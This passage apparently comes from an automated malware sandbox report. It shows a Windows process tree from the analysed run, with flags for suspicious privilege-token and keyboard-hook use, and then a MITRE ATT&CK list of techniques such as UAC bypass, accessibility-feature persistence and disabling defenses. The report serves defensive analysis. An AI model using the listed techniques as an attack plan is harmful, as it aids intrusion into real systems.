  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:8
  2⤵
  PID:964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
  2⤵
  PID:832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3404,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5176 /prefetch:2
  2⤵
  PID:2808

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4404

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:6804

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:8520

C:\Windows\system32\atbroker.exe
atbroker.exe /start magnifierpane
1⤵
PID:6728
- C:\Windows\System32\ATBroker.exe
  C:\Windows\System32\ATBroker.exe /start magnifierpane
  2⤵
  PID:6616
- - C:\Windows\System32\Magnify.exe
    "C:\Windows\System32\Magnify.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8608

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004E4
1⤵
PID:7364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry